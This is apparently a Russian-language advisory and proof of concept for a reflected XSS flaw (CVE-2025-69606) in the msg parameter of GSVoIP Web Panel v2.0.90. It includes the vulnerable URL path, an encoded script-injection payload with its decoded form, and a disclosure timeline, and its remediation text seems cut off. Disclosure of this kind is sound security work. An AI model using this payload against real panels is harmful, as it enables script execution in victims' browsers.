
Доказательство концепции для отражённой XSS-уязвимости (CVE-2025-69606) в GSVoIP Web Panel v2.0.90, демонстрирующее неаутентифицированное произвольное выполнение JavaScript через параметр msg.
Severity: Средний | CWE: CWE-79 | Auth Required: Нет | Vector: Удалённый
Уязвимость Reflected Cross-Site Scripting (XSS) была обнаружена в GSVoIP Web Panel (v2.0.90). Параметр msg конечной точки ошибки не санирует вводимые пользователем данные перед их отражением в HTML-ответе, что позволяет выполнить произвольный JavaScript в браузере жертвы.
| Поле | Описание |
|---|
| Продукт | GSVoIP Web Panel |
| Версия | 2.0.90 (возможно, более ранние версии) |
| Вендор | Solutions VoIP (GS Solutions) |
| CWE | CWE-79 — Межсайтовый скриптинг |
| Вектор атаки | Удалённо / Сеть |
| Аутентификация | Не требуется |
GET /painel/gateways.php/error?msg=<payload>
Параметр msg отражается непосредственно в HTML-ответе без санации или кодирования вывода.
https://{TARGET}/painel/gateways.php/error?msg=%3Cscript%3Ealert(1)%3C%2Fscript%3E
Декодировано:
<script>alert(1)</script>
При переходе по созданному URL внедрённая полезная нагрузка выполняется в браузере жертвы:
alert(1)
msg.script-src.| Шаг | Событие |
|---|---|
| 1 | Уязвимость обнаружена и сообщена Luiz Eduardo |
| 2 | Назначен CVE: CVE-2025-69606 |
| 3 | Публичное раскрытие |
Обнаружено и сообщено Luiz Eduardo
CVE-2025-69606 · CWE-79 · GSVoIP Web Panel v2.0.90